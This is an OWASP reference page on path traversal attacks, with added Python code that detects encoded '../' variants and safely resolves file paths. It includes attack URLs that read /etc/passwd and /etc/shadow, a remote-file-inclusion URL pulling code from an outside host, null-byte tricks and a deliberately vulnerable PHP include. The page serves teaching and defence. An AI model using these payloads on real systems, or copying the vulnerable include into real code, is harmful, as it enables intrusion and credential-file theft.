Difference between revisions of "Path Traversal"

From OWASP
(Reverting to last version not containing links to www.textc4tzellaror.com)
 
(45 intermediate revisions by 6 users not shown)

Latest revision as of 13:29, 27 May 2009

This is an Attack. To view all attacks, please see the Attack Category page.





Overview

A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration and critical system files, limited only by the operating system's access controls (the attacker reads with the privileges of the web server process). The attacker uses "../" sequences to move up towards the root directory, which permits navigation through the whole file system.

This attack can also be executed by injecting external malicious code into the path, as in the Resource Injection attack. No specific tool is needed to perform it; attackers typically use a spider/crawler to enumerate all available URLs and then test every parameter that names a file.

This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

Related Security Activities

How to Avoid Path Traversal Vulnerabilities

See the OWASP Guide article on how to Avoid Path Traversal Vulnerabilities.

How to Test for Path Traversal Vulnerabilities

See the OWASP Testing Guide article on how to Test for Path Traversal Vulnerabilities.

Description

Request variations

Encoding and double encoding:

%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../ 
%2e%2e%5c represents ..\
%2e%2e\ represents ..\ 
..%5c represents ..\ 
%252e%252e%255c represents ..\ 
..%255c represents ..\ and so on. 

Unicode/UTF-8 encoding (only on systems that decode UTF-8 sequences leniently)

Note that web containers perform one level of decoding on percent-encoded values from forms and URLs, which is why the double-encoded forms above survive until the application decodes them again. The sequences below are overlong (non-shortest-form) UTF-8 encodings of "/" and "\": a strict decoder rejects them, while a lenient one maps them back to the ASCII separator, often after a filter that looked for the literal characters has already run.

..%c0%af represents ../ 
..%c1%9c represents ..\ 
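The encoding table above is easiest to check mechanically. The following Python is an added example, not code from the OWASP page: it percent-decodes a value up to twice (to catch double encoding), folds the overlong UTF-8 forms the way a lenient decoder would, unifies "\" and "/", and then looks for a ".." path segment. The sample inputs at the bottom are the variants from the table plus two benign values, constructed for illustration.

```python
"""Added example (not from the OWASP page): fold the encoded "../" variants
listed above back to a canonical form and flag parent-directory references.
The sample inputs at the bottom are constructed for illustration."""
import re
from urllib.parse import unquote_to_bytes

# Overlong two-byte UTF-8: lead bytes 0xC0/0xC1 can only encode code points
# below 0x80 (plain ASCII). Strict decoders reject them; lenient ones do not.
_OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
# A ".." that forms a whole path segment (after separators are unified).
_DOTDOT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def _fold_overlong(data: bytes) -> bytes:
    """Decode overlong 2-byte sequences the way a lenient decoder would."""
    def repl(m):
        lead, cont = m.group(0)          # two ints from the 2-byte match
        return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])
    return _OVERLONG.sub(repl, data)


def canonicalize(raw: str, passes: int = 2) -> str:
    """Percent-decode up to `passes` times (catches double encoding), fold
    overlong UTF-8, then unify backslash and slash so one check covers
    both UNIX and Windows separators."""
    data = raw.encode("utf-8")
    for _ in range(passes):
        decoded = unquote_to_bytes(data)
        if decoded == data:              # nothing left to decode
            break
        data = decoded
    data = _fold_overlong(data)
    # latin-1 maps every byte to a character, so nothing is lost here
    return data.decode("latin-1").replace("\\", "/")


def is_traversal(raw: str) -> bool:
    """True if the value contains a parent-directory reference once decoded."""
    return _DOTDOT.search(canonicalize(raw)) is not None


# Constructed inputs: the variants from the table above plus two benign values.
SAMPLES = [
    "%2e%2e%2f", "%2e%2e/", "..%2f", "%2e%2e%5c", "%2e%2e\\", "..%5c",
    "%252e%252e%255c", "..%255c", "..%c0%af", "..%c1%9c",
    "report.pdf", "file..name/report.pdf",
]


def check_samples() -> dict:
    """Map each sample to whether it decodes to a traversal sequence."""
    return {s: is_traversal(s) for s in SAMPLES}


if __name__ == "__main__":
    for s, hit in check_samples().items():
        print(f"{s!r:24} -> {canonicalize(s)!r:10} traversal={hit}")
```

Two decoding passes are enough for the double-encoded forms in the table; a detection rule that decodes only once, or that looks for the literal characters before the container has decoded the value, misses half of them. Canonicalize first, then match, and treat the canonical form (not the raw request string) as the value to validate.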

OS specific

UNIX

 Root directory: "/"
 Directory separator: "/"

WINDOWS

 Root directory: "<partition letter>:\"
 Directory separator: "/" or "\"

Note that Windows ignores trailing "." characters on a file name and tolerates redundant separators, so a validation routine that compares the literal string may not match what the file system actually opens.

In many runtimes, an encoded null byte (%00) can be injected to terminate the filename: the application's string keeps going, but the underlying C-style file API stops at the first NUL. For example, sending a parameter like:

?file=secret.doc%00.pdf

results in the application (a Java application, in this example) seeing a string that ends with ".pdf" while the operating system opens a file that ends in ".doc". Attackers use this trick to bypass extension-based validation routines. Recent Java releases, PHP 5.3.4 and later, and Python 3 reject file names that contain a null byte, so the trick mainly affects older runtimes and native code, but it is still worth testing.

Examples

Example 1

To identify whether this attack is possible, observe how the application references the resources it serves. The following URLs show typical parameters worth testing:

 http://some_site.com.br/get-files.jsp?file=report.pdf  
 http://some_site.com.br/get-page.php?home=aaa.html  
 http://some_site.com.br/some-page.asp?page=index.html  

In these examples it is possible to insert a malicious string as the parameter value to access files located outside the web root:

  http://some_site.com.br/get-files?file=../../../../some dir/some file 
  http://some_site.com.br/../../../../some dir/some file 

The following URLs show examples of *NIX password file exploitation. Note that /etc/shadow is readable only by root, so the first request succeeds only if the web server runs with excessive privilege; /etc/passwd is world-readable and is the usual first target.

http://some_site.com.br/../../../../etc/shadow  
http://some_site.com.br/get-files?file=/etc/passwd 

Note: on Windows, "..\" sequences cannot leave the partition that holds the web root, since a relative path never crosses drive letters (another drive is reachable only with an absolute path such as D:\). On Linux there is a single directory tree, so the attacker can reach any file on any mounted file system, subject only to the permissions of the web server process.

Example 2

If the parameter is passed to an include function that accepts URLs (remote file inclusion), it is also possible to include files and scripts hosted on an external website:

 http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php   

Example 3

This example illustrates a case in which an attacker makes the server disclose its own CGI source code by asking the script to serve itself:

 http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi   

Example 4

This example was extracted from: Wikipedia - Directory Traversal

A typical example of vulnerable application code is:

<?php
$template = 'blue.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];   // attacker-controlled, never validated
include ( "/home/users/phpguru/templates/" . $template );
?>

An attack against this system could be to send the following HTTP request:

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

Generating a server response such as:

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh

The repeated ../ characters after /home/users/phpguru/templates/ have caused include() to traverse to the root directory, and then include the UNIX password file /etc/passwd. Nine ../ sequences are more than the four actually needed; surplus ../ at the root directory are ignored, so attackers over-supply them rather than guess the depth of the base directory.

UNIX /etc/passwd is the file most commonly used to demonstrate directory traversal: it is world-readable on every UNIX system, so a successful read proves the vulnerability, and historically it held the password hashes that crackers would try to crack (on modern systems those live in /etc/shadow, readable only by root).

Absolute Path Traversal

The following URLs may be vulnerable to this attack:

http://testsite.com/get.php?f=list
http://testsite.com/get.cgi?f=2
http://testsite.com/get.asp?f=test

An attacker can exploit this by supplying an absolute path instead of a file name, which an unchecked concatenation or path-join uses as-is:

http://testsite.com/get.php?f=/var/www/html/get.php
http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc
http://testsite.com/get.asp?f=/etc/passwd

When the web server returns verbose error information from the web application (stack traces, "file not found: /var/www/html/..." messages), it is much easier for the attacker to guess the correct locations, e.g. the path to a source file, which can then be displayed.
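Both the relative traversal of Example 4 and the absolute-path variant above come from the same defect: user input is joined onto a base directory and opened without checking where the result actually points. The following Python is an added example, not code from the OWASP page: it reproduces the unchecked join (note that os.path.join discards the base directory when the user path is absolute), then shows a hardened resolver that rejects null bytes, rejects absolute paths, and resolves the joined path with realpath before checking that it is still inside the base directory. The directory tree, file names and contents are constructed for the demo; the code is POSIX-oriented.

```python
"""Added example (not from the OWASP page): the unchecked concatenation from
Example 4 next to a hardened version that survives relative traversal,
absolute paths and the %00 trick. Paths, file names and contents are
constructed for the demo; the code is POSIX-oriented."""
import os
import shutil
import tempfile


class PathTraversalError(ValueError):
    pass


def vulnerable_read(base_dir: str, user_path: str) -> bytes:
    """Mirrors include("/home/users/phpguru/templates/" . $template):
    "../" climbs out of base_dir, and an absolute user_path makes
    os.path.join discard base_dir entirely."""
    with open(os.path.join(base_dir, user_path), "rb") as f:
        return f.read()


def resolve_safe_path(base_dir: str, user_path: str) -> str:
    """Return the real path of user_path inside base_dir, or raise."""
    if "\x00" in user_path:                       # %00 truncation trick
        raise PathTraversalError("null byte in path")
    if os.path.isabs(user_path) or os.path.splitdrive(user_path)[0]:
        raise PathTraversalError("absolute path not allowed")
    base = os.path.realpath(base_dir)
    # realpath collapses "..", "." and symlinks before the containment check,
    # so the check is made on what the OS would actually open.
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise PathTraversalError("path escapes base directory")
    return target


def safe_read(base_dir: str, user_path: str) -> bytes:
    with open(resolve_safe_path(base_dir, user_path), "rb") as f:
        return f.read()


def demo() -> dict:
    """Build a throwaway tree and exercise both readers; returns outcomes by label."""
    root = tempfile.mkdtemp()
    try:
        base = os.path.join(root, "templates")
        os.makedirs(base)
        with open(os.path.join(base, "blue.php"), "w") as f:
            f.write("blue template")
        with open(os.path.join(root, "secret.txt"), "w") as f:      # outside base
            f.write("SECRET")
        attempts = {
            "plain": "blue.php",
            "relative": "../secret.txt",
            "absolute": os.path.join(root, "secret.txt"),
            "nullbyte": "blue.php\x00.txt",
        }
        out = {"vulnerable_leak": vulnerable_read(base, "../secret.txt").decode()}
        for label, p in attempts.items():
            try:
                out[label] = "allowed: " + safe_read(base, p).decode()
            except PathTraversalError as e:
                out[label] = "blocked: " + str(e)
        return out
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:16} {v}")
```

The containment check compares resolved paths, not the request string, so it is indifferent to how the "../" was encoded as long as the check runs on the value the application will actually open. Because realpath follows symlinks, a link inside the base directory that points outside it is also refused; if serving through such links is intended, allow-list those targets explicitly rather than loosening the check.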

Related Threat Agents

* Category: Information Disclosure

Related Attacks

* Path Manipulation
* Relative Path Traversal
* Resource Injection

Related Vulnerabilities

* Category: Input Validation Vulnerability

Related Controls

* Category: Input Validation

References

* http://cwe.mitre.org/data/definitions/22.html
* http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
* http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV